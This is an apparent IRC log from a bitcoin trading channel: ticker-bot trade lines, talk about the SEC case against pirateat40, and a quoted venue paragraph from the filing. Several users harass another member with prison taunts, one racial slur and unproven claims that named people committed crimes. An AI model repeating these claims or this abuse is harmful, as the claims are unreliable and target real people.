01:47:09 [BTCTC] [DMS.SELLING] 150 @ 0.0201 = 3.015 BTC [-] Jul 24 01:47:11 [BTCTC] [DMS.SELLING] 58 @ 0.0197 = 1.1426 BTC [-] Jul 24 01:47:12 i'm like wait, bitcoin trading company Jul 24 01:47:29 shoulda just called it Burnside Jul 24 01:48:25 [BTCTC] [ASICMINER-PT] 1 @ 4.702 BTC [-] Jul 24 01:48:37 [BTCTC] [DMS.SELLING] 167 @ 0.02099 = 3.5053 BTC [+] Jul 24 01:48:47 [BTCTC] [DMS.SELLING] 118 @ 0.0211 = 2.4898 BTC [+] Jul 24 01:48:51 [BTCTC] [AMC-PT] 37 @ 0.003545 = 0.1312 BTC [+] Jul 24 01:48:53 [BTCTC] [AMC-PT] 74 @ 0.003544 = 0.2623 BTC [-] Jul 24 01:48:55 [BTCTC] [AMC-PT] 60 @ 0.003536 = 0.2122 BTC [-] Jul 24 01:48:56 [BTCTC] [AMC-PT] 120 @ 0.003535 = 0.4242 BTC [-] Jul 24 01:48:58 [BTCTC] [AMC-PT] 500 @ 0.003532 = 1.766 BTC [-] Jul 24 01:48:59 [BTCTC] [AMC-PT] 150 @ 0.003525 = 0.5288 BTC [-] Jul 24 01:49:01 [BTCTC] [AMC-PT] 1035 @ 0.003521 = 3.6442 BTC [-] Jul 24 01:49:01 [BTCTC] [AMC-PT] 2024 @ 0.003511 = 7.1063 BTC [-] Jul 24 01:49:34 [BTCTC] [DMS.SELLING] 5 @ 0.0211 = 0.1055 BTC [+] Jul 24 01:49:51 [BTCTC] [COGNITIVE] 2 @ 0.751 = 1.502 BTC [-] Jul 24 01:49:53 [BTCTC] [COGNITIVE] 1 @ 0.751 BTC [-] Jul 24 01:49:54 [BTCTC] [COGNITIVE] 1 @ 0.751 BTC [-] Jul 24 01:50:24 so anyway, has burnside acknowledged a problem anywhere? Jul 24 01:50:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.046 = 0.138 BTC [+] Jul 24 01:52:10 problem with what Jul 24 01:52:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [+] Jul 24 01:52:25 trading doesnt work Jul 24 01:52:43 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0036 = 0.0072 BTC [+] Jul 24 01:52:49 does for me Jul 24 01:53:10 [BTCTC] [TAT.MINIGAME] 1 @ 0.0003075 BTC [+] Jul 24 01:53:24 hmm Jul 24 01:54:14 try another browser Jul 24 01:54:18 [BTCTC] [TAT.MINIGAME] 8 @ 0.000315 = 0.0025 BTC [+] Jul 24 01:54:19 [BTCTC] [AMC-PT] 6 @ 0.003684 = 0.0221 BTC [+] Jul 24 01:54:20 or logging out and in Jul 24 01:54:24 or clearing cache Jul 24 01:54:38 he updated the site last night Jul 24 01:54:45 to only allow 4 significant digits Jul 24 01:54:49 and had some hiccups Jul 24 01:54:55 shit is srsly fucked up Jul 24 01:55:35 !ticket b tat.minigame Jul 24 01:55:41 !ticker b tat.minigame Jul 24 01:55:45 Good morning, may you serve the Lord, and may His holy dominion guide you through your dismal life. Jul 24 01:55:50 [BTCTC] [TAT.MINIGAME] 4 @ 0.000315 = 0.0013 BTC [+] Jul 24 01:55:51 !ticker btc tat.minigame Jul 24 01:55:52 [BTCT:TAT.MINIGAME] 1D: 0.000295 / 0.0003 / 0.000315 (25009 shares, 7.4 BTC), 7D: 0.000295 / 0.0003 / 0.000315 (25009 shares, 7.4 BTC), 30D: 0.000295 / 0.0003 / 0.000315 (25009 shares, 7.4 BTC) Jul 24 01:58:13 [BTCTC] [ASICMINER-PT] 1 @ 4.737 BTC [+] Jul 24 01:58:16 [BTCTC] [ASICMINER-PT] 3 @ 4.737 = 14.211 BTC [+] Jul 24 02:00:37 [BTCTC] [DMS.MINING] 5 @ 0.0104 = 0.052 BTC [+] Jul 24 02:04:58 [BTCTC] [CRYPTO-TRADE] 2 @ 0.194 = 0.388 BTC [-] Jul 24 02:05:14 [BTCTC] [DMS.MINING] 6 @ 0.01111 = 0.0667 BTC [+] Jul 24 02:05:44 [BTCTC] [CRYPTO-TRADE] 2 @ 0.193 = 0.386 BTC [-] Jul 24 02:05:48 yoyo mjr_ Jul 24 02:05:55 what up Jul 24 02:06:12 [BTCTC] [DMS.MINING] 26 @ 0.0104 = 0.2704 BTC [-] Jul 24 02:06:48 what's the haps, mon frere Jul 24 02:06:51 how's dat tree? Jul 24 02:07:04 http://dilbert.com/ Jul 24 02:07:07 The official Dilbert website with Scott Adams' color comic strips, animation, mashups and more Jul 24 02:07:41 going very well Jul 24 02:07:51 https://bitcointalk.org/index.php?topic=261116.0 Jul 24 02:07:57 2013-07-23 Wired.com - Why the Only Real Way to Buy Bitcoins Is on the Streets Jul 24 02:08:14 [BTCTC] [TAT.ASICMINER] 14 @ 0.045235 = 0.6333 BTC [-] Jul 24 02:08:16 [BTCTC] [TAT.ASICMINER] 6 @ 0.045233 = 0.2714 BTC [-] Jul 24 02:08:18 [BTCTC] [TAT.ASICMINER] 24 @ 0.04523 = 1.0855 BTC [-] Jul 24 02:08:32 nice article Jul 24 02:09:03 [BTCTC] [AMC-PT] 15 @ 0.003675 = 0.0551 BTC [-] Jul 24 02:09:48 [BTCTC] [DMS.MINING] 6 @ 0.01111 = 0.0667 BTC [+] Jul 24 02:09:50 [BTCTC] [DMS.MINING] 15 @ 0.0115 = 0.1725 BTC [+] Jul 24 02:09:50 [BTCTC] [DMS.MINING] 77 @ 0.0119 = 0.9163 BTC [+] Jul 24 02:10:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [+] Jul 24 02:10:44 yeah man i saw that Jul 24 02:10:46 a+ Jul 24 02:10:48 [BTCTC] [TAT.MINIGAME] 2500 @ 0.000295 = 0.7375 BTC [-] Jul 24 02:10:53 death to the centralized exchanges Jul 24 02:11:03 for now, at least. Jul 24 02:11:10 [BTCTC] [AMC-PT] 46 @ 0.003629 = 0.1669 BTC [-] Jul 24 02:11:20 some day it's inevitable, but at the moment it feels like a bunch of coders who only see problems to solve with code Jul 24 02:12:20 yeah Jul 24 02:12:28 and a whole new crop coming up Jul 24 02:12:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.04523 BTC [-] Jul 24 02:13:19 [BTCTC] [TAT.MINIGAME] 3 @ 0.000315 = 0.0009 BTC [+] Jul 24 02:13:37 it's the hype cycle Jul 24 02:13:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.04523 BTC [-] Jul 24 02:13:48 either ignore it or learn to scam it Jul 24 02:13:52 did i say scam? Jul 24 02:13:54 i meant surf. Jul 24 02:13:56 surf. Jul 24 02:14:07 ;) Jul 24 02:14:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.04523 BTC [-] Jul 24 02:15:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.04523 BTC [-] Jul 24 02:17:03 [BTCTC] [AMC-PT] 40 @ 0.003675 = 0.147 BTC [+] Jul 24 02:17:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.04523 BTC [-] Jul 24 02:17:45 deez niggaz indeed. Jul 24 02:17:52 [BTCTC] [COGNITIVE] 1 @ 0.7505 BTC [-] Jul 24 02:19:21 [BTCTC] [AMC-PT] 80 @ 0.003676 = 0.2941 BTC [+] Jul 24 02:19:23 [BTCTC] [AMC-PT] 250 @ 0.003679 = 0.9198 BTC [+] Jul 24 02:19:25 [BTCTC] [AMC-PT] 500 @ 0.00368 = 1.84 BTC [+] Jul 24 02:19:27 [BTCTC] [AMC-PT] 25 @ 0.003684 = 0.0921 BTC [+] Jul 24 02:19:29 [BTCTC] [AMC-PT] 50 @ 0.003685 = 0.1843 BTC [+] Jul 24 02:19:30 [BTCTC] [AMC-PT] 35 @ 0.003692 = 0.1292 BTC [+] Jul 24 02:19:32 [BTCTC] [AMC-PT] 71 @ 0.003693 = 0.2622 BTC [+] Jul 24 02:19:33 [BTCTC] [AMC-PT] 750 @ 0.003698 = 2.7735 BTC [+] Jul 24 02:19:34 [BTCTC] [AMC-PT] 739 @ 0.003699 = 2.7336 BTC [+] Jul 24 02:19:48 [BTCTC] [ASICMINER-PT] 3 @ 4.738 = 14.214 BTC [+] Jul 24 02:20:02 [BTCTC] [DMS.MINING] 18 @ 0.01199 = 0.2158 BTC [+] Jul 24 02:21:33 [BTCTC] [DMS.MINING] 6 @ 0.012 = 0.072 BTC [+] Jul 24 02:21:52 [BTCTC] [AMC-PT] 380 @ 0.003698 = 1.4052 BTC [-] Jul 24 02:22:14 [BTCTC] [AMC-PT] 261 @ 0.003699 = 0.9654 BTC [+] Jul 24 02:23:07 [BTCTC] [DMS.MINING] 4 @ 0.012 = 0.048 BTC [+] Jul 24 02:23:33 [BTCTC] [AMC-PT] 213 @ 0.003699 = 0.7879 BTC [+] Jul 24 02:24:11 [BTCTC] [AMC-PT] 37 @ 0.003699 = 0.1369 BTC [+] Jul 24 02:25:30 [BTCTC] [COGNITIVE] 5 @ 0.7505 = 3.7525 BTC [-] Jul 24 02:26:14 [BTCTC] [AMC-PT] 500 @ 0.0037 = 1.85 BTC [+] Jul 24 02:26:16 [BTCTC] [AMC-PT] 250 @ 0.003721 = 0.9303 BTC [+] Jul 24 02:26:19 [BTCTC] [AMC-PT] 500 @ 0.003722 = 1.861 BTC [+] Jul 24 02:26:22 [BTCTC] [AMC-PT] 20 @ 0.003729 = 0.0746 BTC [+] Jul 24 02:26:23 [BTCTC] [AMC-PT] 20 @ 0.00373 = 0.0746 BTC [+] Jul 24 02:26:25 [BTCTC] [AMC-PT] 20 @ 0.00373 = 0.0746 BTC [+] Jul 24 02:26:37 [BTCTC] [AMC-PT] 127 @ 0.003739 = 0.4749 BTC [+] Jul 24 02:26:39 [BTCTC] [AMC-PT] 255 @ 0.00374 = 0.9537 BTC [+] Jul 24 02:26:41 [BTCTC] [AMC-PT] 295 @ 0.003744 = 1.1045 BTC [+] Jul 24 02:26:42 [BTCTC] [AMC-PT] 580 @ 0.003745 = 2.1721 BTC [+] Jul 24 02:26:44 [BTCTC] [AMC-PT] 10 @ 0.003747 = 0.0375 BTC [+] Jul 24 02:26:46 [BTCTC] [GSDPT] 14 @ 0.00331 = 0.0463 BTC [-] Jul 24 02:26:47 [BTCTC] [AMC-PT] 750 @ 0.003748 = 2.811 BTC [+] Jul 24 02:26:49 [BTCTC] [AMC-PT] 1000 @ 0.003749 = 3.749 BTC [+] Jul 24 02:26:51 [BTCTC] [AMC-PT] 500 @ 0.00375 = 1.875 BTC [+] Jul 24 02:26:52 [BTCTC] [AMC-PT] 150 @ 0.003779 = 0.5669 BTC [+] Jul 24 02:26:53 [BTCTC] [AMC-PT] 300 @ 0.00378 = 1.134 BTC [+] Jul 24 02:26:55 [BTCTC] [AMC-PT] 2930 @ 0.003798 = 11.1281 BTC [+] Jul 24 02:26:56 [BTCTC] [AMC-PT] 1000 @ 0.003799 = 3.799 BTC [+] Jul 24 02:31:20 lol Jul 24 02:31:20 [BTCTC] [TAT.MINIGAME] 300 @ 0.000315 = 0.0945 BTC [+] Jul 24 02:32:10 i wanna know more names! Jul 24 02:32:17 well, handles Jul 24 02:32:24 idc about the names Jul 24 02:32:57 the guy covering his mouth obv Jul 24 02:33:17 <[\\\]> thestringpuller, how do you know pirate is in jail? Jul 24 02:33:48 <[\\\]> I saw the filing Jul 24 02:34:04 <[\\\]> that's a formality. I imagine they're already frozen Jul 24 02:34:28 [BTCTC] [DMS.MINING] 10 @ 0.01119 = 0.1119 BTC [-] Jul 24 02:34:30 [BTCTC] [DMS.MINING] 16 @ 0.0112 = 0.1792 BTC [+] Jul 24 02:34:31 pirate is the guy right beside chaang Jul 24 02:34:35 in the white Jul 24 02:35:02 [HAVELOCK] [HIM] 2 @ 0.225 = 0.45 BTC [-] Jul 24 02:35:22 did i miss a pic ? Jul 24 02:35:34 http://i.imgur.com/oL1GtPN.jpg Jul 24 02:35:40 https://bitcointalk.org/index.php?topic=102327.msg1134404#msg1134404 Jul 24 02:35:44 The gauntlet has officially been thrown down by Trendon Shavers aka. pirateat40 Jul 24 02:36:11 <[\\\]> ok Jul 24 02:36:16 <[\\\]> that post I hav eissues with Jul 24 02:36:18 <[\\\]> "Honestly, I can't see why anyone wouldn't want to trust that guy with their life savings." Jul 24 02:36:27 <[\\\]> why would ANYONE invest their life savings into bitcoin Jul 24 02:36:38 <[\\\]> that'd just be stupid, regardless of pirate Jul 24 02:36:46 lol Jul 24 02:36:49 <[\\\]> investing in pirate was the icing on the cake Jul 24 02:37:03 [BTCTC] [ASICMINER-PT] 1 @ 4.738 BTC [+] Jul 24 02:37:11 <[\\\]> mircea_popescu: regardless of your feeling of bitcoin, putting all of your eggs in a single basket is prone to omlets. Jul 24 02:37:39 [\\\] perhaps. put all your eggs in one basket and watch that basket is a time honored strat. Jul 24 02:37:52 in retrospect everything'\s obvious, but hey. Jul 24 02:39:02 is the azn chick goat btw ? Jul 24 02:39:04 <[\\\]> Chaaaang-Noi, there's more money to be made serving ads than some asshat's picture? Jul 24 02:39:12 <[\\\]> you don't have to be arrested to be charged Jul 24 02:39:17 <[\\\]> get your facts straight Jul 24 02:39:20 <[\\\]> it happens all the time. Jul 24 02:39:30 <[\\\]> They file and issue a bench warrant Jul 24 02:39:42 <[\\\]> its pirate's hooker Jul 24 02:39:46 <[\\\]> paid for with your bitcoins Jul 24 02:39:54 [MPEX] [S.MPOE] 6650 @ 0.00080877 = 5.3783 BTC [+] Jul 24 02:40:02 <[\\\]> sec usually has other agencies arrest I'm pretty sure Jul 24 02:40:08 coulda done better. Jul 24 02:40:13 this is vegas right ? Jul 24 02:40:18 <[\\\]> mircea_popescu, aye Jul 24 02:40:28 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.003167 = 0.0633 BTC [-] Jul 24 02:40:30 <[\\\]> thestringpuller, most likely, IANAL Jul 24 02:40:42 <[\\\]> Chaaaang-Noi, you don't have good pictures. Jul 24 02:40:46 kinda funnay how everyone's got glasses. Jul 24 02:40:53 [BTCTC] [DMS.MINING] 26 @ 0.01199 = 0.3117 BTC [+] Jul 24 02:40:53 isnt that OneFixt's gf? Jul 24 02:40:56 [BTCTC] [DMS.MINING] 46 @ 0.012 = 0.552 BTC [+] Jul 24 02:41:04 the case is probavbly codenamed "operation optometrist" in sec circles. Jul 24 02:41:28 [BTCTC] [DMS.MINING] 40 @ 0.0113 = 0.452 BTC [-] Jul 24 02:42:55 [BTCTC] [DMS.SELLING] 12 @ 0.02099 = 0.2519 BTC [-] Jul 24 02:43:49 [BTCTC] [DMS.MINING] 1 @ 0.01075 BTC [-] Jul 24 02:44:28 [BTCTC] [AMC-PT] 88 @ 0.003789 = 0.3334 BTC [-] Jul 24 02:45:15 [BTCTC] [AMC-PT] 325 @ 0.00379 = 1.2318 BTC [+] Jul 24 02:46:22 [HAVELOCK] [HIM] 1 @ 0.228 BTC [+] Jul 24 02:47:14 [BTCTC] [TAT.MINIGAME] 6 @ 0.000315 = 0.0019 BTC [+] Jul 24 02:47:28 [BTCTC] [BFMINES] 10 @ 0.003331 = 0.0333 BTC [-] Jul 24 02:47:58 [BTCTC] [DMS.MINING] 13 @ 0.0105 = 0.1365 BTC [-] Jul 24 02:48:00 mircea_popescu, what do you think about the SEC involving itself in bitcoin policing? Jul 24 02:48:01 [BTCTC] [AMC-PT] 26 @ 0.00379 = 0.0985 BTC [+] Jul 24 02:48:07 ltcglobal has had some Jul 24 02:48:11 bitfunder too Jul 24 02:48:20 [BTCTC] [AMC-PT] 325 @ 0.003799 = 1.2347 BTC [+] Jul 24 02:48:21 [BTCTC] [AMC-PT] 50 @ 0.0038 = 0.19 BTC [+] Jul 24 02:48:22 [BTCTC] [AMC-PT] 100 @ 0.0038 = 0.38 BTC [+] Jul 24 02:48:23 not sure about BTCT Jul 24 02:48:23 [BTCTC] [AMC-PT] 500 @ 0.0038 = 1.9 BTC [+] Jul 24 02:48:24 [BTCTC] [AMC-PT] 250 @ 0.003829 = 0.9573 BTC [+] Jul 24 02:48:25 [BTCTC] [AMC-PT] 500 @ 0.00383 = 1.915 BTC [+] Jul 24 02:48:27 [BTCTC] [AMC-PT] 5 @ 0.00385 = 0.0193 BTC [+] Jul 24 02:48:28 [BTCTC] [AMC-PT] 200 @ 0.00385 = 0.77 BTC [+] Jul 24 02:48:30 [BTCTC] [AMC-PT] 4200 @ 0.00385 = 16.17 BTC [+] Jul 24 02:48:31 [BTCTC] [AMC-PT] 300 @ 0.003875 = 1.1625 BTC [+] Jul 24 02:48:32 [BTCTC] [AMC-PT] 700 @ 0.00388 = 2.716 BTC [+] Jul 24 02:48:34 [BTCTC] [AMC-PT] 260 @ 0.00389 = 1.0114 BTC [+] Jul 24 02:48:34 [BTCTC] [AMC-PT] 6606 @ 0.0039 = 25.7634 BTC [+] Jul 24 02:48:39 lol... Jul 24 02:48:51 pretty much Jul 24 02:48:57 it's a belize company Jul 24 02:48:59 [BTCTC] [AMC-PT] 394 @ 0.0039 = 1.5366 BTC [+] Jul 24 02:49:04 but operator is in US Jul 24 02:49:25 [BTCTC] [AMC-PT] 300 @ 0.00383 = 1.149 BTC [-] Jul 24 02:49:28 [BTCTC] [AMC-PT] 1230 @ 0.00392 = 4.8216 BTC [+] Jul 24 02:50:21 [BTCTC] [AMC-PT] 350 @ 0.00395 = 1.3825 BTC [+] Jul 24 02:50:34 Chaaaang-Noi: https://www.litecoinglobal.com/security/LTC-GLOBAL, under financial management Jul 24 02:50:42 [BTCTC] [DMS.MINING] 70 @ 0.011 = 0.77 BTC [+] Jul 24 02:51:48 [BTCTC] [DMS.MINING] 3 @ 0.012 = 0.036 BTC [+] Jul 24 02:52:05 indeed Jul 24 02:52:23 [BTCTC] [TAT.VIRTUALMINE] 18 @ 0.003599 = 0.0648 BTC [+] Jul 24 02:52:31 benkay_ mmm i was impressed so far with their drscriptions Jul 24 02:52:52 [BTCTC] [AMC-PT] 50 @ 0.003935 = 0.1968 BTC [-] Jul 24 02:52:54 [BTCTC] [AMC-PT] 50 @ 0.00395 = 0.1975 BTC [+] Jul 24 02:52:56 [BTCTC] [AMC-PT] 325 @ 0.00395 = 1.2838 BTC [+] Jul 24 02:53:23 heh Jul 24 02:53:29 Your order has been shipped! Jul 24 02:53:34 guess who Jul 24 02:54:12 bfl! Jul 24 02:54:20 [BTCTC] [ASICMINER-PT] 1 @ 4.703 BTC [-] Jul 24 02:54:21 [BTCTC] [ASICMINER-PT] 2 @ 4.702 = 9.404 BTC [-] Jul 24 02:54:24 [BTCTC] [ASICMINER-PT] 1 @ 4.701 BTC [-] Jul 24 02:54:25 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 24 02:54:52 [BTCTC] [TAT.ASICMINER] 500 @ 0.046 = 23 BTC [+] Jul 24 02:57:18 [BTCTC] [ASICMINER-PT] 1 @ 4.684 BTC [-] Jul 24 02:57:45 [BTCTC] [TAT.ASICMINER] 89 @ 0.046 = 4.094 BTC [+] Jul 24 02:57:47 [BTCTC] [TAT.ASICMINER] 11 @ 0.046 = 0.506 BTC [+] Jul 24 02:58:14 wd! congrats! make suyre you're at home tomorrow Jul 24 02:58:22 between 9 and 13. or between 15 and 19 Jul 24 02:59:21 [BTCTC] [DMS.MINING] 14 @ 0.013 = 0.182 BTC [+] Jul 24 03:01:03 [BTCTC] [TAT.ASICMINER] 6 @ 0.04652 = 0.2791 BTC [+] Jul 24 03:01:06 dat 15-19 Jul 24 03:01:18 you can leave the 9-13s for c/n Jul 24 03:03:55 chaang-noi: you better save your bitcoins for the lawyer fees you are going to have to pay to stay out of a US prison Jul 24 03:04:07 when the DOJ indictments come out Jul 24 03:04:17 haha yeah you think pirate's going down alone? Jul 24 03:04:25 he'll take you with him Jul 24 03:04:27 out of spite. Jul 24 03:04:34 says in the SEC civil action other parties are going down too Jul 24 03:04:40 just wait for SEC to submit to DOJ Jul 24 03:04:59 us regulator's are slavering for bitcoin crims Jul 24 03:05:02 nope FBI is. Jul 24 03:05:08 they got osama Jul 24 03:05:15 SEC is civil action there is an ongoing investigation with the DOJ Jul 24 03:05:17 live in fear for the rest of your life Jul 24 03:05:19 party to fraud Jul 24 03:05:29 chaang-noi: you were actively running a feeder for a ponzi scheme Jul 24 03:05:30 accessory Jul 24 03:05:36 "but i didn't knoooow" Jul 24 03:05:39 lololololololol Jul 24 03:06:08 thats a civil action Jul 24 03:06:16 not a criminal one, the criminal investigation is still ongoing Jul 24 03:06:21 and youll be arrested in that one chaang. Jul 24 03:06:40 id say 60% chance you get named in a DOJ indictment Jul 24 03:06:54 [BTCTC] [GSDPT] 12 @ 0.00345 = 0.0414 BTC [+] Jul 24 03:06:58 if that happens youll be extradited out of thailand since i believe they have extradition. or if they dont youll never leave it in your life Jul 24 03:07:16 considering all the evidence is public and you ran a feeder fund for a 70mil ponzi. Jul 24 03:07:32 chaang-noi: read the SEC civil action they say other parties are going down too Jul 24 03:07:34 you can read the fear dripping off of your words, c/n. Jul 24 03:07:55 you always retreat to troll accusations whenever things get even moderately uncomfortable for you Jul 24 03:07:59 the SEC case isnt a worry its when the DOJ finishes the investigation Jul 24 03:08:10 chaang yes but it says in there others are going down too Jul 24 03:08:17 the SEC is merely a civil case pal Jul 24 03:08:36 you were active participant in $70mil ponzi that is minimum 10 years in US prison. Jul 24 03:08:46 chaang thats just a civil action. Jul 24 03:08:50 the criminal one will pop up too Jul 24 03:09:02 dude its 50-60% chance you get in trouble Jul 24 03:09:10 your all over the forums Jul 24 03:09:17 running the "pass thru" Jul 24 03:09:28 you were feeding the scam. Jul 24 03:09:44 even if you win the case, an indictment alone will cost you 500k minimum to stay out of US prisons. Jul 24 03:09:56 in lawyer fees Jul 24 03:10:14 yes i do. Jul 24 03:10:21 [BTCTC] [TAT.ASICMINER] 50 @ 0.04652 = 2.326 BTC [+] Jul 24 03:10:26 i said for weeks the pirate shit going to come back at you Jul 24 03:10:28 [MPEX] [S.MPOE] 1770 @ 0.00080877 = 1.4315 BTC [+] Jul 24 03:10:38 chaang noi you actively ran a feeder into the scheme Jul 24 03:10:51 theymos and company Jul 24 03:11:14 chaang noi you refunded people out of your own pocket by admission Jul 24 03:11:23 after the heat came down Jul 24 03:11:44 man your all over the forums running a "pass thru" into a 70mil ponzi scheme Jul 24 03:11:59 thats nice, you can tell the court that Jul 24 03:12:11 id say its a coin flip if you get indicted when the criminala ction comes out Jul 24 03:12:18 action* Jul 24 03:12:25 you werent just trolling. Jul 24 03:12:44 chaang you were trying to ride coat tails to make a quick buck Jul 24 03:13:01 criminal ignorance is not a defense Jul 24 03:13:17 knowing they are nerds they will do anything to save themselves Jul 24 03:13:35 its 100% guarantee criminal proceedings come out, just nobody knows who is named in them Jul 24 03:13:39 theres no way it will just be pirate Jul 24 03:14:05 and i bet voorhees gets in trouble too within 6months Jul 24 03:14:13 for his little gambling charade Jul 24 03:14:28 chaang bullshit the scam just collapsed last year Jul 24 03:14:36 the government takes awhile to gather evidence you know that Jul 24 03:14:45 theres tons of it Jul 24 03:14:52 the bitcoin blockchain is proof. Jul 24 03:15:08 voorhees is already in trouble Jul 24 03:15:13 its why he "sold" it Jul 24 03:15:22 i warned voorhees months ago in the channel Jul 24 03:15:27 about his retarded idea Jul 24 03:15:37 he should have never disclosed himself publicly all over the place Jul 24 03:15:52 the worst part about voorhees was while he was running SDICE he was also at bitinstant Jul 24 03:16:20 voorhees was publicly stating he was avoiding taxes too in panama Jul 24 03:16:39 i mean how DUMB can you be to use your real name and commit all sorts of US crimes lol Jul 24 03:17:07 dude the guy was in the chat claiming how he didnt want to pay taxes Jul 24 03:17:17 but I'm a libertarian! Jul 24 03:17:20 lol Jul 24 03:17:24 you can't get me with your laws and things Jul 24 03:17:33 chaang noi id say its 50/50 that you get caught up Jul 24 03:17:45 because one of those nerds you were partnered with theymos will just rat you out Jul 24 03:18:07 he will man Jul 24 03:18:19 theymos is a loser hell do anything to save his own skin Jul 24 03:18:23 lol great defense Jul 24 03:19:29 i can guarantee you whoever gets named will cooperate Jul 24 03:19:37 its obvious someone is providing the feds with info Jul 24 03:20:49 SEC is not important Jul 24 03:20:59 its if the other alphabet FBI is involved Jul 24 03:21:07 SEC is just a civil action Jul 24 03:21:14 well yea obviously Jul 24 03:21:17 [BTCTC] [DMS.SELLING] 46 @ 0.02052 = 0.9439 BTC [-] Jul 24 03:21:27 chaang noi that isnt a indictment Jul 24 03:21:58 they will Jul 24 03:21:58 I'm glad I made the decision to get out of the politics bullshit and just work as a code monkey Jul 24 03:22:03 let other people worry about all the legal crap :P Jul 24 03:22:05 becuase its $70mil Jul 24 03:22:12 the problem was that bitcoin appreciated Jul 24 03:22:21 so a few mil turned into tens of mil Jul 24 03:22:41 they dont have to call it money Jul 24 03:22:49 if someone scammed you out of personal property does it have to be money? Jul 24 03:22:56 are stocks money? Jul 24 03:23:31 btc is a virtual currency that has value Jul 24 03:23:54 chaang noi the point is you were actively participating in a ponzi scheme Jul 24 03:24:14 and not just as an investor but as someone who collects funds Jul 24 03:24:20 because "theymos" told you so Jul 24 03:25:55 https://bitcointalk.org/index.php?topic=82573.msg1141682#msg1141682 Jul 24 03:26:00 P Jul 24 03:26:02 chaang noi youve got logs posted all over the forums Jul 24 03:26:19 yes you will be defending yourself in a criminal court, hence what i said to prepare 500-1mil USD Jul 24 03:26:29 worse case you lose a few mil and serve 1-2 years Jul 24 03:27:05 it makes it look like you are participating in it Jul 24 03:27:55 chaang noi you left footprints everywhere Jul 24 03:28:05 your having a discussion with pirate as some sort of a bond/passthru operator Jul 24 03:28:14 [BTCTC] [BFMINES] 10 @ 0.003999 = 0.04 BTC [+] Jul 24 03:28:44 mhmm Jul 24 03:29:17 [BTCTC] [BFMINES] 133 @ 0.004 = 0.532 BTC [+] Jul 24 03:30:04 yea but you were just an investor is the problem Jul 24 03:30:09 werent* Jul 24 03:30:31 man im not going to go build a case i couldnt give a shit Jul 24 03:30:39 i warned you for awhile your shady dealings would come back Jul 24 03:31:20 not wrong yet Jul 24 03:31:56 chaang noi you should be preparing liquid funds for your defense in the US. Jul 24 03:32:24 lol where do you think the trial will be Jul 24 03:32:33 theres a 50% chance you get indicted Jul 24 03:32:46 you think pirate will keep his mouth shit? Jul 24 03:32:53 hes going to bring other people down Jul 24 03:32:59 and theymos WILL rat on you Jul 24 03:33:15 theymos is going to get owned with actively promoting various scams Jul 24 03:33:21 pirate ponzi, BFL etc. Jul 24 03:33:35 guy runs a scam bazaar as a forum Jul 24 03:34:51 the thing about theymos is hes been involved in alot of scams on that forum Jul 24 03:35:01 or indirectly promoting them for financial gain Jul 24 03:35:15 he advertises BFL labs etc. Jul 24 03:35:32 it seems theymos has been involved in every single major scam so far Jul 24 03:35:52 thats nice to know Jul 24 03:36:09 [HAVELOCK] [AM100] 6 @ 0.04420001 = 0.2652 BTC [+] Jul 24 03:36:20 Venue is proper in this district under Section 22(a) of the Securities Act and Jul 24 03:36:20 Section 27 of the Exchange Act [15 U.S.C. §§ 77v(a) and 78aa] because Defendants may be Jul 24 03:36:20 found in and are inhabitants of McKinney, Texas; and because certain of the acts, practices, Jul 24 03:36:20 transactions and courses of business alleged herein occurred within the Eastern District of Texas. Jul 24 03:36:32 they picked venue the easy way. Jul 24 03:36:39 chaang noi you were a scumbag with questionable ethics hence you made the perfect bitcoiner, you looked for trends/coat tails to ride for fast profits Jul 24 03:37:02 you know this filing actuyally shows the us govt is really trying hard not to fuck up with btc. Jul 24 03:37:44 they do claim the investments were securities however, i'm curious if that will be challenged by the parties. Jul 24 03:39:28 [HAVELOCK] [AM100] 10 @ 0.0442 = 0.442 BTC [-] Jul 24 03:39:36 do was pirate actually apprehended and/or physically located by SEC? Jul 24 03:40:03 so* Jul 24 03:41:21 the sec doth not do that. Jul 24 03:42:32 chaaang better start getting that b-hole nice and lose in preparation for your new bunk buddy Jul 24 03:42:36 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003183 BTC [-] Jul 24 03:43:31 [BTCTC] [DMS.SELLING] 102 @ 0.02052 = 2.093 BTC [-] Jul 24 03:44:39 Chaaaang-Noi: http://en.wikipedia.org/wiki/Viktor_Bout Jul 24 03:44:56 [HAVELOCK] [AM100] 14 @ 0.04420001 = 0.6188 BTC [+] Jul 24 03:46:24 asciilifeform perhaps not the best example. Jul 24 03:46:35 [BTCTC] [ASICMINER-PT] 1 @ 4.737 BTC [+] Jul 24 03:46:38 guy used to run guns for the us, eventually they had a falling out. Jul 24 03:47:08 [BTCTC] [ASICMINER-PT] 2 @ 4.738 = 9.476 BTC [+] Jul 24 03:48:05 [BTCTC] [AMC-PT] 200 @ 0.003832 = 0.7664 BTC [-] Jul 24 03:48:18 [HAVELOCK] [AM100] 207 @ 0.04420001 = 9.1494 BTC [+] Jul 24 03:48:28 mircea_popescu: better example: http://www.ticotimes.net/More-news/News-Briefs/Costa-Rica-U.S.-call-for-extradition-law-to-fight-organized-crime_Thursday-May-30-2013 Jul 24 03:48:36 haha chasdos Jul 24 03:48:45 chaang noi no the FBI will. Jul 24 03:49:00 and your also a US citizen Jul 24 03:49:01 indeed, much better example. Jul 24 03:49:06 locating you wont be a problem Jul 24 03:49:40 [HAVELOCK] [AM100] 4 @ 0.0442 = 0.1768 BTC [-] Jul 24 03:50:32 mircea is actively interesting so hes prepared when its his turn once he gets taken down for running a boiler room Jul 24 03:50:47 [BTCTC] [COGNITIVE] 1 @ 0.7505 BTC [-] Jul 24 03:51:16 [BTCTC] [ASICMINER-PT] 1 @ 4.738 BTC [+] Jul 24 03:52:01 poor goat Jul 24 03:52:05 [BTCTC] [DMS.MINING] 5 @ 0.012 = 0.06 BTC [-] Jul 24 03:52:10 can anyone answer though, has pirate been physically located? Jul 24 03:52:15 all he wanted was a thai wife and live the easy life Jul 24 03:52:50 his big mouth and low IQ got him in the end Jul 